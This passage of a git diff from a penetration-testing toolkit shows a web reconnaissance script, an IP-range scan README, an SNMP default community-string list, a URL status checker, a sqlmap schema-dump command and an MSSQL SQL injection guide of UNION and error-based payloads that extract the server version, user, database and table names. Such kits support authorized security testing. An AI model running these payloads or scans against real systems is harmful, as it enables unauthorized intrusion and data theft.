magenta(text): - return colored(text, 'magenta', attrs=['bold']) - -def blue(text): - return 
colored(text, 'blue', attrs=['bold']) - -################################ - -message = """ - __ __ _ _____ - \ \ / / | | | __ \ - \ \ /\ / /__| |__ | |__) |___ ___ ___ _ __ - \ \/ \/ / _ \ '_ \| _ // _ \/ __/ _ \| '_ \ - \ /\ / __/ |_) | | \ \ __/ (_| (_) | | | | - \/ \/ \___|_.__/|_| \_\___|\___\___/|_| |_| - - Web Application Reconnaissance | @maldevel - {}: {} -""".format(blue('Version'), green(__version__)) - -########################### - -def parseArgs(): - parser = argparse.ArgumentParser(description=message, formatter_class=RawTextHelpFormatter) - parser.add_argument("-u", "--url", action="store", metavar='URL', dest='url', type=str, - default=None, required=True, - help='The url to scan, e.g. http://example.com, https://example.com, http://192.168.1.1') - parser.add_argument('-o', '--output', action='store', metavar='LOGFILE', dest='logs', type=str, default=None, - help='Log file path') - args = parser.parse_args() - - return args - -########################### - -def find_headers(url, logfile): - - print magenta('[+] Headers') - if logfile: - logfile.write('### Headers\n\n') - - try: - r = requests.head(url, verify=False) - except: - print red("[-] An error has occured: {}.\n".format(sys.exc_info()[0])) - return False - - for key, value in r.headers.items() : - print '{} {}: {}'.format(green('>'), key, value) - if logfile: - logfile.write('* {}: {}\n'.format(key, value)) - - -def find_title(html, logfile): - soup = BeautifulSoup(html, 'lxml') #html5lib - - print magenta('[+] Title') - if logfile: - logfile.write('### Title\n\n') - - title = soup.find('title') - print '{} {}'.format(green('>'), title) - if logfile: - logfile.write('```\n{}\n```\n\n'.format(title)) - - -def find_meta(html, logfile): - soup = BeautifulSoup(html, 'lxml') #html5lib - - print magenta('[+] Meta tags') - if logfile: - logfile.write('### Meta tags\n\n') - - for tag in soup.find_all('meta'): - print '{} {}'.format(green('>'), tag) - if logfile: - 
logfile.write('```html\n{}\n```\n\n'.format(tag)) - - -def find_comments(html, logfile): - soup = BeautifulSoup(html, 'lxml') #html5lib - - print magenta('[+] HTML Comments') - if logfile: - logfile.write('### HTML Comments\n\n') - - for comment in soup.findAll(text=lambda text:isinstance(text, Comment)): - print '{} {}'.format(green('>'), comment) - if logfile: - logfile.write('```html\n{}\n```\n\n'.format(comment)) - -########################## - -def socket_request(hostname, request, port=80, https=False): - CRLF = "\r\n" - - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.settimeout(5) - - if https: - s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1) - - try: - s.connect((hostname, port)) - except: - print red("[-] An error has occured: {}.\n".format(sys.exc_info()[0])) - return False - - s.send(CRLF.join(request)) - - response = b'' - - buffer = s.recv(4096) - while buffer: - response += buffer - buffer = s.recv(4096) - - header, _, body = response.partition(CRLF + CRLF) - s.close() - - return header - - -def malformed_request(url, logfile, port=80, https = False): - hostname = urlparse(url).hostname - - request1 = [ - "GET / HTTP/3.1", - "Host: {}".format(hostname), - "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", - "Accept: text/html", - "Accept-Language: en-US,en;q=0.5", - "Content-Length: 0", - "Connection: Close", - "", - "" - ] - - request2 = [ - "GET / JUNK/1.1", - "Host: {}".format(hostname), - "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", - "Accept: text/html", - "Accept-Language: en-US,en;q=0.5", - "Content-Length: 0", - "Connection: Close", - "", - "" - ] - - request3 = [ - "GET /%00", - "", - "" - ] - - if logfile: - logfile.write('### Malformed Requests\n\n') - - print magenta('[+] Malformed Request - Invalid HTTP Version number') - if logfile: - logfile.write('#### Invalid HTTP Version number\n\n**Response**\n\n') - - resp1 = socket_request(hostname, 
request1) - if resp1: - print '{} {}'.format(green('>'), resp1) - if logfile: - logfile.write('```html\n{}\n```\n\n'.format(resp1)) - - print '' - - print magenta('[+] Malformed Request - Invalid Protocol') - if logfile: - logfile.write('#### Invalid Protocol\n\n**Response**\n\n') - - resp2 = socket_request(hostname, request2) - if resp2: - print '{} {}'.format(green('>'), resp2) - if logfile: - logfile.write('```html\n{}\n```\n\n'.format(resp2)) - - print '' - - print magenta('[+] Malformed Request - Null') - if logfile: - logfile.write('#### Null\n\n**Response**\n\n') - - resp3 = socket_request(hostname, request3) - if resp3: - print '{} {}'.format(green('>'), resp3) - if logfile: - logfile.write('```html\n{}\n```\n\n'.format(resp3)) - -########################## - -def check_secureheaders(url, logfile, https): - results = [] - - secureHeaders = { - 'X-Frame-Options':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Frame-Options', - 'X-XSS-Protection':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-XSS-Protection', - 'X-Content-Type-Options':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Content-Type-Options', - 'Content-Security-Policy':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#Content-Security-Policy', - 'X-Permitted-Cross-Domain-Policies':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Permitted-Cross-Domain-Policies' - } - - if https: - secureHeaders.update({ - 'Strict-Transport-Security':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#HTTP_Strict_Transport_Security_.28HSTS.29', - 'Public-Key-Pins':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#Public_Key_Pinning_Extension_for_HTTP_.28HPKP.29' - }) - - - headers = requests.get(url, verify=False).headers - - print magenta('[+] Missing Secure Headers') - if logfile: - logfile.write('### Missing Secure Headers\n\n') - - for h in list(secureHeaders): - if h not in headers: - print '{} {}: 
{}'.format(green('>'), h, secureHeaders[h]) - if logfile: - logfile.write('* [{}]({})\n'.format(h, secureHeaders[h])) - - if logfile: - logfile.write('\n') - -def find_robotstxt(url, logfile): - txt = requests.get("{}/robots.txt".format(url), verify=False, stream=True).text - - print magenta('[+] Robots.txt') - if logfile: - logfile.write('### Robots.txt\n\n') - - print '{} {}'.format(green('>'), txt) - if logfile: - logfile.write('```\n{}\n```\n\n'.format(txt)) - -def check_cacheheaders(url, logfile): - results = [] - - cacheHeaders = { - 'Cache-control':'no-store', - 'Pragma':'no-cache' - } - - headers = requests.get(url, verify=False).headers - - print magenta('[+] Missing Caching directives') - if logfile: - logfile.write('### Missing caching directives (Cacheable HTTPS response)\n\n') - - for h in list(cacheHeaders): - if h not in headers or headers[h] != cacheHeaders[h]: - print '{} {}: {}'.format(green('>'), h, cacheHeaders[h]) - if logfile: - logfile.write('* [{}]({})\n'.format(h, cacheHeaders[h])) - - if logfile: - logfile.write('\n') - - -if __name__ == '__main__': - - args = parseArgs() - print message - - url = args.url - logs = False - https = False - port = 80 - - if args.logs: - filepath = args.logs - if not filepath.endswith('.md'): - filepath = filepath + '.md' - logs = open(filepath, 'w') - - if 'https' in url: - https = True - - if url.count(":") == 2: - port = url.rsplit(':', 1)[1] - - if '://' not in url: - print red('[-] {}: Invalid url'.format(url)) - sys.exit(1) - - if logs: - logs.write('## Web Application Reconnaissance\n') - logs.write('\n***\n') - logs.write('\n') - - if find_headers(url, logs): - if logs: - logs.write('\n***\n\n') - - print '' - - html = requests.get(url, verify=False).content - - find_title(html, logs) - print '' - if logs: - logs.write('***\n\n') - - find_meta(html, logs) - print '' - if logs: - logs.write('***\n\n') - - find_comments(html, logs) - print '' - if logs: - logs.write('***\n\n') - - malformed_request(url, 
logs, port, https) - print '' - if logs: - logs.write('***\n\n') - - check_secureheaders(url, logs, https) - print '' - if logs: - logs.write('***\n\n') - - find_robotstxt(url, logs) - print '' - if logs: - logs.write('***\n\n') - - check_cacheheaders(url, logs) - print '' - if logs: - logs.write('***\n\n') +#!/usr/bin/python +# encoding: UTF-8 + +""" + This file is part of PenTestKit + Copyright (C) 2017-2018 @maldevel + https://github.com/maldevel/PenTestKit + + PenTestKit - Useful tools for Penetration Testing. + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + For more see the file 'LICENSE' for copying permission. 
+ +""" + +__author__ = "maldevel" +__copyright__ = "Copyright (c) 2017-2018 @maldevel" +__credits__ = ["maldevel"] +__license__ = "GPLv3" +__version__ = "0.2" +__maintainer__ = "maldevel" + +################################ + +import argparse +import sys +import os +import requests +import socket +import ssl + +from bs4 import BeautifulSoup, Comment +from termcolor import colored +from argparse import RawTextHelpFormatter +from urlparse import urlparse + +################################ + +from requests.packages.urllib3.exceptions import InsecureRequestWarning #remove insecure https warning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) #remove insecure https warning + +################################ + +def yellow(text): + return colored(text, 'yellow', attrs=['bold']) + +def green(text): + return colored(text, 'green', attrs=['bold']) + +def red(text): + return colored(text, 'red', attrs=['bold']) + +def cyan(text): + return colored(text, 'cyan', attrs=['bold']) + +def magenta(text): + return colored(text, 'magenta', attrs=['bold']) + +def blue(text): + return colored(text, 'blue', attrs=['bold']) + +################################ + +message = """ + __ __ _ _____ + \ \ / / | | | __ \ + \ \ /\ / /__| |__ | |__) |___ ___ ___ _ __ + \ \/ \/ / _ \ '_ \| _ // _ \/ __/ _ \| '_ \ + \ /\ / __/ |_) | | \ \ __/ (_| (_) | | | | + \/ \/ \___|_.__/|_| \_\___|\___\___/|_| |_| + + Web Application Reconnaissance | @maldevel + {}: {} +""".format(blue('Version'), green(__version__)) + +########################### + +def parseArgs(): + parser = argparse.ArgumentParser(description=message, formatter_class=RawTextHelpFormatter) + parser.add_argument("-u", "--url", action="store", metavar='URL', dest='url', type=str, + default=None, required=True, + help='The url to scan, e.g. 
http://example.com, https://example.com, http://192.168.1.1') + parser.add_argument('-o', '--output', action='store', metavar='LOGFILE', dest='logs', type=str, default=None, + help='Log file path') + args = parser.parse_args() + + return args + +########################### + +def find_headers(url, logfile): + + print magenta('[+] Headers') + if logfile: + logfile.write('### Headers\n\n') + + try: + r = requests.head(url, verify=False) + except: + print red("[-] An error has occured: {}.\n".format(sys.exc_info()[0])) + return False + + for key, value in r.headers.items() : + print '{} {}: {}'.format(green('>'), key, value) + if logfile: + logfile.write('* {}: {}\n'.format(key, value)) + + +def find_title(html, logfile): + soup = BeautifulSoup(html, 'lxml') #html5lib + + print magenta('[+] Title') + if logfile: + logfile.write('### Title\n\n') + + title = soup.find('title') + print '{} {}'.format(green('>'), title) + if logfile: + logfile.write('```\n{}\n```\n\n'.format(title)) + + +def find_meta(html, logfile): + soup = BeautifulSoup(html, 'lxml') #html5lib + + print magenta('[+] Meta tags') + if logfile: + logfile.write('### Meta tags\n\n') + + for tag in soup.find_all('meta'): + print '{} {}'.format(green('>'), tag) + if logfile: + logfile.write('```html\n{}\n```\n\n'.format(tag)) + + +def find_comments(html, logfile): + soup = BeautifulSoup(html, 'lxml') #html5lib + + print magenta('[+] HTML Comments') + if logfile: + logfile.write('### HTML Comments\n\n') + + for comment in soup.findAll(text=lambda text:isinstance(text, Comment)): + print '{} {}'.format(green('>'), comment) + if logfile: + logfile.write('```html\n{}\n```\n\n'.format(comment)) + +########################## + +def socket_request(hostname, request, port=80, https=False): + CRLF = "\r\n" + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(5) + + if https: + s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1) + + try: + s.connect((hostname, port)) + except: + print red("[-] An 
error has occured: {}.\n".format(sys.exc_info()[0])) + return False + + s.send(CRLF.join(request)) + + response = b'' + + buffer = s.recv(4096) + while buffer: + response += buffer + buffer = s.recv(4096) + + header, _, body = response.partition(CRLF + CRLF) + s.close() + + return header + + +def malformed_request(url, logfile, port=80, https = False): + hostname = urlparse(url).hostname + + request1 = [ + "GET / HTTP/3.1", + "Host: {}".format(hostname), + "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", + "Accept: text/html", + "Accept-Language: en-US,en;q=0.5", + "Content-Length: 0", + "Connection: Close", + "", + "" + ] + + request2 = [ + "GET / JUNK/1.1", + "Host: {}".format(hostname), + "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", + "Accept: text/html", + "Accept-Language: en-US,en;q=0.5", + "Content-Length: 0", + "Connection: Close", + "", + "" + ] + + request3 = [ + "GET /%00", + "", + "" + ] + + if logfile: + logfile.write('### Malformed Requests\n\n') + + print magenta('[+] Malformed Request - Invalid HTTP Version number') + if logfile: + logfile.write('#### Invalid HTTP Version number\n\n**Response**\n\n') + + resp1 = socket_request(hostname, request1) + if resp1: + print '{} {}'.format(green('>'), resp1) + if logfile: + logfile.write('```html\n{}\n```\n\n'.format(resp1)) + + print '' + + print magenta('[+] Malformed Request - Invalid Protocol') + if logfile: + logfile.write('#### Invalid Protocol\n\n**Response**\n\n') + + resp2 = socket_request(hostname, request2) + if resp2: + print '{} {}'.format(green('>'), resp2) + if logfile: + logfile.write('```html\n{}\n```\n\n'.format(resp2)) + + print '' + + print magenta('[+] Malformed Request - Null') + if logfile: + logfile.write('#### Null\n\n**Response**\n\n') + + resp3 = socket_request(hostname, request3) + if resp3: + print '{} {}'.format(green('>'), resp3) + if logfile: + logfile.write('```html\n{}\n```\n\n'.format(resp3)) + 
+########################## + +def check_secureheaders(url, logfile, https): + results = [] + + secureHeaders = { + 'X-Frame-Options':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Frame-Options', + 'X-XSS-Protection':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-XSS-Protection', + 'X-Content-Type-Options':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Content-Type-Options', + 'Content-Security-Policy':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#Content-Security-Policy', + 'X-Permitted-Cross-Domain-Policies':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Permitted-Cross-Domain-Policies' + } + + if https: + secureHeaders.update({ + 'Strict-Transport-Security':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#HTTP_Strict_Transport_Security_.28HSTS.29', + 'Public-Key-Pins':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#Public_Key_Pinning_Extension_for_HTTP_.28HPKP.29' + }) + + + headers = requests.get(url, verify=False).headers + + print magenta('[+] Missing Secure Headers') + if logfile: + logfile.write('### Missing Secure Headers\n\n') + + for h in list(secureHeaders): + if h not in headers: + print '{} {}: {}'.format(green('>'), h, secureHeaders[h]) + if logfile: + logfile.write('* [{}]({})\n'.format(h, secureHeaders[h])) + + if logfile: + logfile.write('\n') + +def find_robotstxt(url, logfile): + txt = requests.get("{}/robots.txt".format(url), verify=False, stream=True).text + + print magenta('[+] Robots.txt') + if logfile: + logfile.write('### Robots.txt\n\n') + + print '{} {}'.format(green('>'), txt) + if logfile: + logfile.write('```\n{}\n```\n\n'.format(txt)) + +def check_cacheheaders(url, logfile): + results = [] + + cacheHeaders = { + 'Cache-control':'no-store', + 'Pragma':'no-cache' + } + + headers = requests.get(url, verify=False).headers + + print magenta('[+] Missing Caching directives') + if logfile: + logfile.write('### Missing caching 
directives (Cacheable HTTPS response)\n\n') + + for h in list(cacheHeaders): + if h not in headers or headers[h] != cacheHeaders[h]: + print '{} {}: {}'.format(green('>'), h, cacheHeaders[h]) + if logfile: + logfile.write('* [{}]({})\n'.format(h, cacheHeaders[h])) + + if logfile: + logfile.write('\n') + + +if __name__ == '__main__': + + args = parseArgs() + print message + + url = args.url + logs = False + https = False + port = 80 + + if args.logs: + filepath = args.logs + if not filepath.endswith('.md'): + filepath = filepath + '.md' + logs = open(filepath, 'w') + + if 'https' in url: + https = True + + if url.count(":") == 2: + port = url.rsplit(':', 1)[1] + + if '://' not in url: + print red('[-] {}: Invalid url'.format(url)) + sys.exit(1) + + if logs: + logs.write('## Web Application Reconnaissance\n') + logs.write('\n***\n') + logs.write('\n') + + if find_headers(url, logs): + if logs: + logs.write('\n***\n\n') + + print '' + + html = requests.get(url, verify=False).content + + find_title(html, logs) + print '' + if logs: + logs.write('***\n\n') + + find_meta(html, logs) + print '' + if logs: + logs.write('***\n\n') + + find_comments(html, logs) + print '' + if logs: + logs.write('***\n\n') + + malformed_request(url, logs, port, https) + print '' + if logs: + logs.write('***\n\n') + + check_secureheaders(url, logs, https) + print '' + if logs: + logs.write('***\n\n') + + find_robotstxt(url, logs) + print '' + if logs: + logs.write('***\n\n') + + check_cacheheaders(url, logs) + print '' + if logs: + logs.write('***\n\n') diff --git a/skid/README.md b/skid/README.md index 85d5539..aaedeb9 100644 --- a/skid/README.md +++ b/skid/README.md 
@@ -1,13 +1,13 @@
-## README
-
-### SKID mode
-
-```
-chmod a+x -R PenTestKit/grep
-chmod a+x -R PenTestKit/live-hosts
-chmod a+x -R PenTestKit/generate-scripts-lists
-chmod a+x scan-external-ip-range.sh
-sudo ./scan-external-ip-range.sh x.x.x.x/yy
-```
-
----
+## README
+
+### SKID mode
+
+```
+chmod a+x -R PenTestKit/grep
+chmod a+x -R PenTestKit/live-hosts
+chmod a+x -R PenTestKit/generate-scripts-lists
+chmod a+x scan-external-ip-range.sh
+sudo ./scan-external-ip-range.sh x.x.x.x/yy
+```
+
+---
diff --git a/snmp/community.lst b/snmp/community.lst
index aa07cd9..e832838 100644
--- a/snmp/community.lst
+++ b/snmp/community.lst
@@ -1,3 +1,3 @@
-public
-private
-manager
+public
+private
+manager
diff --git a/sqli/mssql.md b/sqli/mssql.md
index f713c16..113c609 100644
--- a/sqli/mssql.md
+++ b/sqli/mssql.md
@@ -1,87 +1,87 @@ -## MSSQL SQLi Guide - -### Get server version - -*Assuming there’s one column:* - -``` -1 UNION SELECT @@version-- -``` - -``` -1' UNION SELECT @@version-- -``` - -``` -1 AND 1=CONVERT(INT,serverproperty('productversion'))-- -``` - -``` -1' AND 1=CONVERT(INT,serverproperty('productversion'))-- -``` - -*** - -### Get current username - -*Assuming there’s one column:* - -``` -1 UNION SELECT user_name()-- -``` - -``` -1' UNION SELECT user_name()-- -``` - -*** - -### Get number of databases - -``` -1 AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT([name]) AS nvarchar(4000)) FROM [master]..[sysdatabases] )+CHAR(58)+CHAR(58)))-- -``` - -``` -1' AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT([name]) AS nvarchar(4000)) FROM [master]..[sysdatabases] )+CHAR(58)+CHAR(58)))-- -``` - -*** - -### Get database names - -*replace N with a number starting from 1* - - -``` -1 AND 1=CONVERT(INT,db_name(N))-- -``` - -``` -1' AND 1=CONVERT(INT,db_name(N))-- -``` - -*** - -### Get number of tables - -``` -1 AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT(*) AS nvarchar(4000)) FROM information_schema.TABLES )+CHAR(58)+CHAR(58)))-- -``` - -``` -1' AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT(*) AS nvarchar(4000)) FROM information_schema.TABLES )+CHAR(58)+CHAR(58)))-- -``` - -### Get Table name - -*replace N with a number starting from 1* - -``` -1 AND 1= CONVERT(INT,(CHAR(58)+(SELECT DISTINCT top 1 TABLE_NAME FROM (SELECT DISTINCT top N TABLE_NAME FROM information_schema.TABLES ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC)+CHAR(58)))-- -``` - -``` -1' AND 1= CONVERT(INT,(CHAR(58)+(SELECT DISTINCT top 1 TABLE_NAME FROM (SELECT DISTINCT top N TABLE_NAME FROM information_schema.TABLES ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC)+CHAR(58)))-- -``` - +## MSSQL SQLi Guide + +### Get server version + +*Assuming there’s one column:* + +``` +1 UNION SELECT @@version-- +``` + +``` +1' UNION SELECT 
@@version-- +``` + +``` +1 AND 1=CONVERT(INT,serverproperty('productversion'))-- +``` + +``` +1' AND 1=CONVERT(INT,serverproperty('productversion'))-- +``` + +*** + +### Get current username + +*Assuming there’s one column:* + +``` +1 UNION SELECT user_name()-- +``` + +``` +1' UNION SELECT user_name()-- +``` + +*** + +### Get number of databases + +``` +1 AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT([name]) AS nvarchar(4000)) FROM [master]..[sysdatabases] )+CHAR(58)+CHAR(58)))-- +``` + +``` +1' AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT([name]) AS nvarchar(4000)) FROM [master]..[sysdatabases] )+CHAR(58)+CHAR(58)))-- +``` + +*** + +### Get database names + +*replace N with a number starting from 1* + + +``` +1 AND 1=CONVERT(INT,db_name(N))-- +``` + +``` +1' AND 1=CONVERT(INT,db_name(N))-- +``` + +*** + +### Get number of tables + +``` +1 AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT(*) AS nvarchar(4000)) FROM information_schema.TABLES )+CHAR(58)+CHAR(58)))-- +``` + +``` +1' AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT(*) AS nvarchar(4000)) FROM information_schema.TABLES )+CHAR(58)+CHAR(58)))-- +``` + +### Get Table name + +*replace N with a number starting from 1* + +``` +1 AND 1= CONVERT(INT,(CHAR(58)+(SELECT DISTINCT top 1 TABLE_NAME FROM (SELECT DISTINCT top N TABLE_NAME FROM information_schema.TABLES ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC)+CHAR(58)))-- +``` + +``` +1' AND 1= CONVERT(INT,(CHAR(58)+(SELECT DISTINCT top 1 TABLE_NAME FROM (SELECT DISTINCT top N TABLE_NAME FROM information_schema.TABLES ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC)+CHAR(58)))-- +``` + diff --git a/sqli/sqlmap.md b/sqli/sqlmap.md index 033b99f..dac260d 100644 --- a/sqli/sqlmap.md +++ b/sqli/sqlmap.md 
@@ -1,14 +1,14 @@
-## SQLmap notes
-
-### Get database schema
-
-* Microsoft SQL Server
-* Error-base
-* POST
-* Burp Pro proxy
-* Specific database
-
-```bash
-sqlmap -v3 -u https://example.com --method=POST --data="post-request-data" --proxy=http://127.0.0.1:8080 -p --os=Windows --technique=E --dbms="Microsoft SQL Server" --schema --dump-format=CSV -D dbname
-```
-
+## SQLmap notes
+
+### Get database schema
+
+* Microsoft SQL Server
+* Error-base
+* POST
+* Burp Pro proxy
+* Specific database
+
+```bash
+sqlmap -v3 -u https://example.com --method=POST --data="post-request-data" --proxy=http://127.0.0.1:8080 -p --os=Windows --technique=E --dbms="Microsoft SQL Server" --schema --dump-format=CSV -D dbname
+```
+
diff --git a/web/check-urls.py b/web/check-urls.py
index 04bbf4c..5ff3edf 100644
--- a/web/check-urls.py
+++ b/web/check-urls.py
@@ -1,119 +1,119 @@ -#!/usr/bin/python -# encoding: UTF-8 - -""" - This file is part of PenTestKit - Copyright (C) 2017 @maldevel - https://github.com/maldevel/PenTestKit - - PenTestKit - Useful tools for Penetration Testing. - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - - For more see the file 'LICENSE' for copying permission. -""" - -__author__ = "maldevel" -__copyright__ = "Copyright (c) 2017 @maldevel" -__credits__ = ["maldevel"] -__license__ = "GPLv3" -__version__ = "0.1" -__maintainer__ = "maldevel" - -################################ - -import requests -from requests.packages.urllib3.exceptions import InsecureRequestWarning -requests.packages.urllib3.disable_warnings(InsecureRequestWarning) -import sys -import os -import argparse -from argparse import RawTextHelpFormatter - -################################ - -def check_url(url, proxies, logfile): - try: - r = requests.head(url, proxies=proxies, verify=False) - print("HEAD: {}: {}".format(url, r.status_code)) - logfile.write('HEAD;{};{}\n'.format(url, r.status_code)) - except Exception as ex: - print("HEAD {}: request failed..".format(url)) - logfile.write('HEAD;{};request failed\n'.format(url)) - - try: - r = requests.get(url, proxies=proxies, verify=False) - print("GET: {}: {}".format(url, r.status_code)) - logfile.write('GET;{};{}\n'.format(url, r.status_code)) - except Exception as ex: - print("GET {}: request failed..".format(url)) - 
logfile.write('GET;{};request failed\n'.format(url)) - - try: - r = requests.post(url, proxies=proxies, verify=False) - print("POST: {}: {}".format(url, r.status_code)) - logfile.write('POST;{};{}\n'.format(url, r.status_code)) - except Exception as ex: - print("POST {}: request failed..".format(url)) - logfile.write('POST;{};request failed\n'.format(url)) - -def check_file_urls(filename, proxies, logfile): - - logfile.write('METHOD;URL;STATUS\n') - with open(filename) as f: - for line in f: - line = line.strip() - - if line: - - url1 = "http://{}".format(line) - url2 = "https://{}".format(line) - - check_url(url1, proxies, logfile) - check_url(url2, proxies, logfile) - - print '' - -if __name__ == '__main__': - - parser = argparse.ArgumentParser(description='{}'.format('Get HTTP response status code for a list of URLs.'), formatter_class=RawTextHelpFormatter) - - parser.add_argument("-f", "--filename", action="store", metavar='FILE', dest='filename', type=str, default=None, required=True, help='File containing urls.') - parser.add_argument("-o", "--output", action="store", metavar='FILE', dest='outputFile', type=str, default='results.csv', required=False, help='File to write results.') - parser.add_argument('-x', '--proxy', action="store", metavar='PROXY', dest='proxy', type=str, default=None, required=True, help='Use proxy (eg. http://127.0.0.1:8080).') - - if len(sys.argv) is 1: - parser.print_help() - sys.exit() - - args = parser.parse_args() - - proxies = { - 'http': args.proxy, - 'https': args.proxy, - } - - print '\n[*] Get HTTP response status code for a list of URLs.' 
- - if (not os.path.isfile(args.filename)): - print '[-] Please provide an existing file.\n' - sys.exit() - - try: - with open(args.outputFile, 'w') as logfile: - print '\nchecking urls from file {}..\n'.format(args.filename) - check_file_urls(args.filename, proxies, logfile) - - except KeyboardInterrupt: - sys.exit(0) +#!/usr/bin/python +# encoding: UTF-8 + +""" + This file is part of PenTestKit + Copyright (C) 2017 @maldevel + https://github.com/maldevel/PenTestKit + + PenTestKit - Useful tools for Penetration Testing. + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + For more see the file 'LICENSE' for copying permission. 
+""" + +__author__ = "maldevel" +__copyright__ = "Copyright (c) 2017 @maldevel" +__credits__ = ["maldevel"] +__license__ = "GPLv3" +__version__ = "0.1" +__maintainer__ = "maldevel" + +################################ + +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) +import sys +import os +import argparse +from argparse import RawTextHelpFormatter + +################################ + +def check_url(url, proxies, logfile): + try: + r = requests.head(url, proxies=proxies, verify=False) + print("HEAD: {}: {}".format(url, r.status_code)) + logfile.write('HEAD;{};{}\n'.format(url, r.status_code)) + except Exception as ex: + print("HEAD {}: request failed..".format(url)) + logfile.write('HEAD;{};request failed\n'.format(url)) + + try: + r = requests.get(url, proxies=proxies, verify=False) + print("GET: {}: {}".format(url, r.status_code)) + logfile.write('GET;{};{}\n'.format(url, r.status_code)) + except Exception as ex: + print("GET {}: request failed..".format(url)) + logfile.write('GET;{};request failed\n'.format(url)) + + try: + r = requests.post(url, proxies=proxies, verify=False) + print("POST: {}: {}".format(url, r.status_code)) + logfile.write('POST;{};{}\n'.format(url, r.status_code)) + except Exception as ex: + print("POST {}: request failed..".format(url)) + logfile.write('POST;{};request failed\n'.format(url)) + +def check_file_urls(filename, proxies, logfile): + + logfile.write('METHOD;URL;STATUS\n') + with open(filename) as f: + for line in f: + line = line.strip() + + if line: + + url1 = "http://{}".format(line) + url2 = "https://{}".format(line) + + check_url(url1, proxies, logfile) + check_url(url2, proxies, logfile) + + print '' + +if __name__ == '__main__': + + parser = argparse.ArgumentParser(description='{}'.format('Get HTTP response status code for a list of URLs.'), formatter_class=RawTextHelpFormatter) + + parser.add_argument("-f", 
"--filename", action="store", metavar='FILE', dest='filename', type=str, default=None, required=True, help='File containing urls.') + parser.add_argument("-o", "--output", action="store", metavar='FILE', dest='outputFile', type=str, default='results.csv', required=False, help='File to write results.') + parser.add_argument('-x', '--proxy', action="store", metavar='PROXY', dest='proxy', type=str, default=None, required=True, help='Use proxy (eg. http://127.0.0.1:8080).') + + if len(sys.argv) is 1: + parser.print_help() + sys.exit() + + args = parser.parse_args() + + proxies = { + 'http': args.proxy, + 'https': args.proxy, + } + + print '\n[*] Get HTTP response status code for a list of URLs.' + + if (not os.path.isfile(args.filename)): + print '[-] Please provide an existing file.\n' + sys.exit() + + try: + with open(args.outputFile, 'w') as logfile: + print '\nchecking urls from file {}..\n'.format(args.filename) + check_file_urls(args.filename, proxies, logfile) + + except KeyboardInterrupt: + sys.exit(0) diff --git a/web/compare-post-data.py b/web/compare-post-data.py index d476d4f..c4ecd26 100644 --- a/web/compare-post-data.py +++ b/web/compare-post-data.py 
